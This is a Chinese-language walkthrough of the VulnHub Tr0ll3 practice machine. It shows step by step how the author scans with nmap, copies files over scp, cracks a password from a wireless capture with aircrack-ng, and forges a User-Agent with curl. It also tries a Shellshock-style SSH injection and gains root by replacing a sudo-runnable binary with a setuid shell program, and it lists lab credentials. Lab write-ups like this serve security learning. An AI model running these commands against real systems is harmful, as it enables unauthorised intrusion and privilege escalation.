vulnhub靶场–靶场
信息收集
主机发现
ifconfig 查看Kali IP
nmap192.168.17.0/24
端口扫描
nmap -sV 192.168.17.130 -p-
可以看到开啦22端口 OpenSSH 7.6p1
信息收集信息整理
只有开放啦一个端口22端口openssh7.6只存在一个用户名的漏洞
本来都打算放弃啦在准备关靶机时看到啦~
登录一下ssh试一试
成功登录
威胁建模
登录ssh
发现也不能访问,然后也没有什么信息啦去看看redpill
我怀疑这是另一个ssh账户
step2:Password1!
啊偶猜错啦耶
然后pwd拉一下打算去看看其他目录。这一看好像是有step2这个用户的,but不知道密码难搞呀~
使用命令 find / -type f -perm 777 2>/dev/null查找具有所有权限的文件。
scp start@IP_address:file_path ./home/Kali/ 将文件从远程主机复制到我们的机器
scp -r start@192.168.17.130:/var/log/.dist-manage/wytshadow.cap ./Documents/Tr0ll3/
scp -r start@192.168.17.130:/.hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk/no/seriously/last/one/rofl/ok/ill/stop/however/this/is/fun/ok/here/rofl/sorry/you/made/it/gold_star.txt ./Documents/Tr0ll3/
查看文件夹成功下载下来啦
查看gold_star.txt
只用wireshart查看wytshadow.cap包所有数据包的协议均为**“802.11”。**
802.11 是用于在无线连接设备之间传输数据包的协议。
其中可以注意到wytshadow只一个用户名
我们使用一个名为aircrack-ng的工具,它可能有助于提取密码。
Aircrack-ng是一个与802.11标准的无线网络分析有关的安全软件,主要功能有:网络侦测,数据包嗅探,WEP和WPA/WPA2-PSK破解。Aircrack-ng可以工作在任何支持监听模式的无线网卡上(设备列表请参阅其官方网站)并嗅探802.11a,802.11b,802.11g的数据。
aircrack-ng 使用 - 知乎 (zhihu.com)
aircrack-ng -w gold_star.txt wytshadow.cap
成功爆出wytshadow密码gaUoCe34t1
有一个红色的东西我一开始以为是文件结果是可执行文件
太可怕啦感觉ctrl+c停止掉
sudo -l查看我们可以使用roo权限开启nginx服务
查看nginx目录
cd /etc/nginx/sites-available
查看配置文件default
可以看到我们可以使用8080上的lynx服务远程处理它然后我们可以使用sudo service nginx start开启服务可以netstat -nalp | less查看服务开启情况端口等
可以看到8080端口开启啦
然后可以在kali上访问 http://192.168.17.130:8080 好像没有耶也访问不了lynxhttp://192.168.17.130:8080再次去理解配置文件–如果请求不包括用户代理,服务器将始终响应 403 错误。不幸的是,由于该文件是只读的,因此我们无法更改配置
这里有几种解决方式
1、curl -H "User-Agent: Lynx Basto" 192.168.56.101:8080
2、抓包修改改user_agent
3、sudo apt-get install lynx 然后通过命令行访问lynx http://192.168.17.130:8080
看来有时一个用户账号啦~ genphlux:HF9nd0cR!
登录查看
可以看到一个RSA密钥文件名就是用户名另一个HTML的目录列表我们尝试ssh登录新用户maleus
scp -r genphlux@192.168.17.130:/home/genphlux/maleus ./home/kali
登录maleus用户
ssh -i maleus maleus@192.168.17.130
ssh maleus@192.168.17.130 -i maleus -t ‘() { :;}; /bin/bash’
要密码耶~尝试啦几种方法都需要密码然后在其他师傅的文章里找到啦原因
SSH服务禁止我们使用权限集太广的证书文件。因此,我们必须首先提前缩小文件权限。
所以现需要缩小文件的权限chmod 600 maleus
成功连接上啦
dont_even_bother是一个可执行文件,运行一下可以看到只是一个需要输入密码的地方。
然后最终在。viminfo文件里找到密码
B^slc8I$
使用sodo -l查看这个用户权限
我们要用一个新的shell文件去覆盖这个文件然后来进行提权因为用户可以以root用户的权限执行文件
int main(void)
{
setgid(0);setuid(0);system("/bin/sh");
}
因为linux5.0之后命令是不能待()括号的如若需要带括号便需要转译。
如下是两种转义方式:
**方式1:**只需在括号前后加上反斜杠[ \ ]。转义括号为可读。
**方式2:**在括号的两端加上[ " " ],注意:这是英文输入法下的双引号哦。
int main\(void\)
{
setgid\(0\);setuid\(0\);system\("/bin/bash"\);
}
在编译一下这个文件
gcc dont_even_bother.c -o dont_even_bother
成功拿flag